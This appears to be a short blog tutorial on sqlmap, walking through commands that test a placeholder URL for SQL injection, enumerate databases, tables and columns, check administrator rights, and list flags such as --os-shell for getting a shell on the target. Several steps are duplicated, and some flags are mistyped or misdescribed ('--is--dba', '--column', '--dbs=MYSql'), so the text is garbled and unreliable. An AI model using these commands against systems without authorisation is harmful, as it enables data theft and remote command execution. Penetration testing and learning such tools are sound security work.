How To Use sqlmap
1. First, we take a look at the help menu in sqlmap to better understand some of the features it offers. This can be done using the following command.
sqlmap -h
2. To scan a URL for SQL vulnerability we can use the following command
sqlmap -u "http://website.com/something.php?something=1"
3. Once a SQL has been detected, we can choose yes (y) to skip all other types of payloads
4. Once SQL has been detected, we can list the databases name using the --dbs flag like the command below.
sqlmap -u "http://website.com/something.php?something=1" --dbs
5. Now that we know how to get the database we can use the --tables and --column flag to get table and column names by using the following command.
sqlmap -u "http://website.com/something.php?something=1" --tables --column
6. To check whether the user is a database administrator, we can use the --is-dba flag
sqlmap -u "http://website.com/something.php?something=1" --is--dba
7. The sqlmap command has a lot of flags. We can use the following table to see the different types of flags and what they do.
5. Now that we know how to get the database we can use the --tables and --column flag to get table and column names by using the following command.
sqlmap -u "http://website.com/something.php?something=1" --tables --column
6. To check whether the user is a database administrator, we can use the --is-dba flag
sqlmap -u "http://website.com/something.php?something=1" --is--dba
7. The sqlmap command has a lot of flags. We can use the following table to see the different types of flags and what they do.
Flag | Description |
---|---|
--tables | Dumps all table names |
-T | Specifies a table name to perform an operation on |
--os-cmd | Execute an operating system command |
--os-shell | Prompts a command shell to the system |
-r | Specifies a filename to run the SQL test on |
--tamper | Users a tamper script |
--eta | Show estimated time remaining to dump data |
--dbs=MYSql, MSSQL, Oracle | We can manually choose a database and perform injection for specific database types only. |
--proxy | Specifies a proxy |
0 comments:
Post a Comment